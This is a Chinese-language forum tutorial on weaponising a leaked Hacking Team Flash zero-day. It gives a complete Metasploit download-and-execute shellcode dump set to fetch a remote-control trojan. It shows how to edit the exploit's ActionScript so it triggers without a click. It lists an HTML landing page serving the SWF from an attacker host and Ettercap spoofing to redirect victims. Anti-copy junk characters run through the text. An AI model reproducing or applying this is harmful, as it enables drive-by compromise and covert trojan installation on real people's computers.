flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

, e# {7 U$ D* t% D 三、flash 0day之手工代码修改制作下载者实例入侵演示 " C# K6 M/ w7 C* e% Q; l, a

1 n* {9 a+ A* E1 {$ r# ^! a 利用到的工具： - ^' N! p# {9 V% k9 W: h7 H

$ _: ~+ |4 z- ? Msf , V8 i# s2 t0 I T( i

3 Y& v. t% L& O; w' \9 r+ f8 h2 ? Ettercap $ O5 t! o+ |8 U: D+ B4 c$ Z

9 I! Y* k' ^3 \' x, t9 x Adobe Flash CS6 # H3 G( C. K3 O1 r% X

* \# N0 v* ^. i1 n7 ]! {) i Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 , Z/ b2 Q4 E: R

/ @% P; q0 K5 Q* A2 v- h( r* `2 [4 a 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options # h7 n+ j' Z3 R* {( A

! C4 ?* _9 J6 A8 I 如图： 4 F. k0 E9 _0 K

& z% F% `6 c9 Q% t& Z" k + ~& ]3 V8 L* h) ^. H) ^& q' T

8 {4 B, ?4 V: C& m$ h1 B$ { A2 p$ T5 r" M

) e# R# e7 x3 A2 [8 W 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: % N7 ^) S6 h! @1 l" F3 s

) d7 q" X! f# I* }6 p+ u& z' L! p : m& j% F- V/ m$ V* I0 w

$ V6 r: ^0 A+ `& d8 P$ `( s ! E) e" K8 t( o- W; Q4 J7 l. ^

1 _" @: n9 d& S* J. p! \ 然后执行generate -t dword生成shellcode，如下： 8 M+ ^3 r. Q9 t- J: s

1 q5 s, x7 F. L/ X/ y2 ~ + G3 ~8 `+ { p/ e% D8 @# y4 ~2 j

) m1 ?. O! H d3 \ s 复制代码到文本下便于我们一会编辑flash exp，如下： $ ~2 G% b! P' a3 h4 d1 ]. ^9 a

) M! \5 D b/ ~( R& S 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, $ Y4 w7 v* k. G9 b+ G1 u- j7 F

3 L. U6 R) x9 N& k6 a/ ?8 P! k 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, & F1 O) G* n, |7 j! A# a1 n

/ k8 c' Q! P' I0 g. S' x 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 1 m$ E9 f* I5 e3 w

2 ^8 Y/ W5 E r) z' S! m 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 H& R' x9 `( G' G

; _2 m% {: e3 e9 u 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % _9 e8 E( }7 O. ~' d

1 F/ G4 _; D' V6 U 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 8 z" S! ^% D3 ~9 T( ?

7 ]1 O; L; m C; W( X! N 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, - j* X% C3 K0 V9 w& i

3 [7 w2 [4 f% Z2 a- v3 }. ~. N 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 8 q, b! a- B( E: A% u% ?# \+ c6 g

1 J" K& [9 y; u6 |9 D 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ' b j* |1 K K

" J- U7 c( n+ [- e0 y0 p 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, # ^3 j T7 ?* Z; f6 e

, j% h% q; T% m) E# \) k. W 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - D O) e3 Y5 u

/ c U) n/ l3 i% Y+ q: @0 c 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 @3 ]! |: \& U0 @7 U2 I, n

' Q+ v- Q1 ?; g( `5 f: R& k 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 9 e6 l$ b! |1 T ?

7 T7 D, Q4 w. a, K 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 4 N1 |/ F& |, l8 N% V! i9 {2 a! h

3 d: _$ U9 ?, `- J$ V5 W / A0 Q3 O6 V& s5 q2 L

. D5 v @. J) C& ?) h0 D' D ! f) u( |- M+ ^2 T0 |

- j, i- v w) Q0 A9 } 下面我们来修改flash 0day exp，需要修改三个文件，分别为： 8 n: t) @+ h3 d8 w! x3 a

+ w% h9 l7 ^. i/ M: {2 h) t ' n" f- Q$ |; [1 K5 a2 \6 T" T4 G

& ?2 [; L) ^) u 先修改ShellWin32.as，部分源代码如图： * ~ |3 G& i/ I2 u8 G

- b. S$ Q% u1 j8 T . E5 z3 |8 G Y; q- K" C( _: }

) g8 b+ `0 j G3 E 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： 2 ? Z! v ?4 v- X

7 }+ b G9 m/ C3 b" C+ ?5 o ) O# x( T5 \! v+ M$ v

5 q: l- I" @. B( w+ k) `3 `" G 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： ! Y- b+ X& |; ~: Z. M

N8 L0 D1 M5 [' V( q # M2 G# }( w: F8 r% O X

& V, U9 u" e' O3 g# t4 @" l% }/ g& Q S' ] 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： & Q9 i) ?2 Z5 l* g- t

" S8 E. a/ r# P% p6 {/ P8 s ! _* y& ?$ J" K% \

, o7 T' c% J$ b" `9 T# ? - v3 x9 Z$ e @$ b! P

: Y& S$ }7 i4 k+ g) M0 i! c 8 K7 G, q+ g4 _4 x s, c8 h

( E! X3 ^) V( }8 `! P 然后点保存，下面我们来编译一下，打开 $ w4 N7 ~8 h' ]2 S) C8 e

8 Y" O Z( d: d3 e5 K( y exp1.fla然后点文件-发布，看看编译没错误 " G# q2 K! E/ p4 K, r7 ~

% t! B6 [* m. i- b7 Y- \7 N # ^8 O# U+ t& d, Y4 L& f

6 L0 n6 _5 y: f. @$ X : Y% e( Q/ [$ M6 |- R

2 w" F w1 G" H- X W7 j' k( P6 c h1 T/ V , p: N: ^, E3 i4 S

" a0 @1 L% W% ~* x+ T + i' z2 b9 a6 v7 m+ J% @

. v1 v3 ?6 @: f# O; { 然后我们把生成的 ! Q6 O. c3 M1 Y

% e5 s3 h- ~3 c1 U! Q exp1.swf丢到kailinux 的/var/www/html下： + s+ z8 _( [9 U8 n, m( H. R! ^

z9 T& o$ ?* m/ j: @/ z% w 然后把这段代码好好编辑一下 # d+ y% ]& X. P: f5 E5 `

9 X' M. n- b7 P+ f 4 J# t5 F" [9 A6 b$ L

) m" N' y2 z E9 [/ D A" ^: d / z" E+ f* n% D" A0 r/ ]

; w# n3 D& t& }! J/ G( |) o7 H" O3 Z X B3 _; n5 @

2 q5 j2 m! E4 P+ U ' P0 N/ R7 V1 ]2 j; F1 I

% D& B& J$ o( a6 f1 B' k " v- `4 V0 w& _' |( f

2 ^0 h. z" D7 V6 k3 I3 P 3 S4 ?1 Q2 s( {$ H, G6 [. s+ ^# Z

; V0 v# m0 I) E# U4 N r" I1 k <!DOCTYPE html> ' g' T/ Z! s6 z' S- r

* n& T. O$ s. o, X$ E' q, ? <html> / ^- R1 T' e% D

- r$ J# \+ d/ j5 x/ v <head> 1 C9 u: I" i, u

2 H% ~, H, y& G/ Z5 d <meta http-equiv="Content-Type" content="text/html; , C+ m9 F$ q2 R

' f- l5 R5 g! `) _: c charset=utf-8"/> 5 G8 x/ e& p7 q) Z; Q9 b0 Y

% m9 T# ?7 d, W& T) G </head> % B4 a7 s* Y! g( K

7 u V+ H- `# g$ |- N! ` <body> : [: C' E$ D1 o3 i9 q7 k# R

y, D: k' \# a) ] <h2> Please wait, the requested page is loading...</h2> ( ^0 k! \ a$ i0 A9 U

8 ?, h8 x1 |' [8 T9 b <br> ) T3 D. |2 U" q9 \' M4 x7 a, \

: [. E/ m7 x8 Z% e <OBJECT & B- _3 p: R8 P, g, t" p4 u$ W6 R+ \

4 |+ v' E' _$ J+ z# O( b classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie * f. V' b' N3 S) ~

, l5 x( S1 L4 j. l( a VALUE="http://192.168.0.109/exp1.swf"></OBJECT> , v! B/ k% b7 z$ B" Q( a' `

1 L3 q v+ J% ?3 F+ e/ R [5 | </body> ( `' @4 T6 g' b# P: |/ h+ \# J. b

6 Z6 ^5 v6 o C6 \8 [/ l* D <script> ; D- @' ?- Q* Z( ?; u( k

` o) ]2 d6 G2 E. N setTimeout(function () { 8 u2 n, ^. X8 v2 C3 f

- N7 J/ ?# ?4 x: C2 b @; S0 l) C! J" A) J/ @) E

: l! G( R# D: F- a window.location.reload(); : Q- c& y: [* d) D2 ]

) X. i8 ^6 u6 S# K }, 10000); * y) D$ g+ q1 I, K$ D5 h6 p

& I. C5 J5 h0 M" L ? ! X: O0 l" ]6 T

/ \. Q2 g+ P% N+ x& T </script> 1 ?8 o" b; d% O- b

9 m( q2 h. W$ t" ~ </html> / p# T6 H+ k) P( j% O

, ^, |* I, e% l" O! n " A# p, z5 n: U9 e% P

! Q& j: `" T- [. l9 V7 b! u 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： 0 \& I" s2 q! e+ x X E4 ^6 C

6 L1 O x' e4 H3 w; Y0 S6 @3 q ! D2 J" A1 I$ X) Q) X

- C$ \, T/ L7 A; L* h) K 9 V V# ] K# k8 s* X/ a

9 E2 f6 {$ a% @ : m# \2 b9 B; x( y/ F1 G

8 w) l) \0 R. W) E& | # _0 r ^( G# _. p; H

: `* I: n4 I7 C# r e ( A: Y" }2 Z0 n/ ?; D. h

, Y) |: a- x, t 下面我们用ettercap欺骗如图： ' ]1 u' F9 e- ~, M3 ^

0 O+ w4 }% f' z( e $ `6 @; A$ {3 C, V# n

- K" _$ G4 N) m6 k" B3 a. f7 r7 y ) R4 V; ^7 u% c7 l3 [

" N! `- y6 d! ^7 s" B! ] 下面我们随便访问个网站看看： $ U3 u6 e1 \/ j t

3 W) N2 t! b4 q7 V5 i 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： ' P' ?2 w+ E! e2 n) r9 P/ s

: `7 S5 B! \3 D3 h7 d , f% t& M) ?" z5 S) c8 F+ S: x

; [ {8 k" |. J; M 我们看另一台， 3 e! N9 v8 G; Y9 s

# M2 n) _1 r- W' ]% ]( C/ @& k 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 3 B# c& k# ^5 B

		自动登录	找回密码
密码			立即注册